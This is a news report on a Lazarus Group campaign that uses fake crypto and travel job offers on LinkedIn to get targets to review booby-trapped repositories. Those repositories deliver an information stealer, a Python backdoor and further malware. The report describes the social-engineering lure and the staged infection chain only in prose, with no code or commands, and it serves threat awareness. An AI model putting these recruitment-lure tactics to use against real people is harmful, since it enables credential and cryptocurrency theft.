A new cyber threat attributed to the North Korea-linked Lazarus Group has surfaced, where attackers exploit fake LinkedIn job offers in the cryptocurrency and travel sectors to deliver malicious software. This campaign targets operating systems across the board, including Windows, macOS, and Linux.
According to cybersecurity firm Bitdefender, the operation initiates through messages on professional social networking sites, enticing potential victims with lures such as remote work, flexible hours, and attractive compensation. When a target shows interest, attackers typically request a resume or a link to a personal GitHub repository, framing this as part of a ‘hiring process.’
Bitdefender detailed in a report that while these requests may appear benign, they frequently serve ulterior motives, like data harvesting or providing the interaction with a deceptive layer of authenticity. Following the collection of personal details, a malicious link is sent under the pretense of sharing a GitHub or Bitbucket repository for a supposed decentralized exchange (DEX) project. Victims are then instructed to review the project and provide feedback.
The malicious code embedded within the repository is designed to pull down next-stage payloads from a specified URL, deploying a cross-platform JavaScript information stealer aimed at extracting sensitive data from cryptocurrency wallet extensions installed in the target’s browser. This initial compromise is just the beginning; the malware is equipped to act as a loader for a Python-based backdoor that actively monitors clipboard changes, maintains continuous remote access, and facilitates the installation of additional malware.
Notably, the tactics demonstrated by this group align with a previously identified attack cluster known as Contagious Interview, which encompasses other malicious activities tied to the deployment of a JavaScript stealer named BeaverTail and a Python implant known as InvisibleFerret. Bitdefender’s analysis indicates that the infection process aligns closely with this cluster, while also spotlighting variances in the JavaScript payloads employed in past attacks. The threat actors appear to be responsive, continuously evolving their methods to circumvent detection.
Further examination reveals that the malware, propagated through the Python component, consists of a .NET binary that can initiate a TOR proxy server for communicating with command-and-control (C2) servers, extract fundamental system data, and deliver subsequent payloads capable of logging keystrokes and employing cryptocurrency miners for unauthorized profit.
Potentially impacted individuals and businesses can learn from this evolving threat landscape. The methodologies observed in this campaign hint at several tactics outlined in the MITRE ATT&CK framework. Initial access might be achieved through phishing techniques, while persistence is maintained via backdoor installations and network exploitation tactics. Privilege escalation could also be a factor, with the remote access attributed to malware and its ability to disable security tools.
The evidence suggests that these tactics are not isolated incidents but rather part of a broader and more sophisticated attack strategy. Reports of similar incidents have been circulated on platforms such as LinkedIn and Reddit, underscoring the widespread nature of these scams. Tweaks to the attack vectors include asking candidates to clone Web3 repositories or address deliberately coded bugs during interview processes.
In one instance, a Bitbucket repository linked to the misleading recruitment effort referenced a now-unavailable project called “miketoken_v2.” Insiders reveal that this activity mirrors prior campaigns, as the names of the repositories and the profiles of the recruiters frequently rotate while retaining the underlying malicious intent.
This disclosure occurs shortly after SentinelOne’s announcement regarding the use of the Contagious Interview campaign in conjunction with another malware variant dubbed FlexibleFerret. As cyber risks continue to evolve, businesses must remain vigilant and proactive in safeguarding their digital environments against these sophisticated attacks.
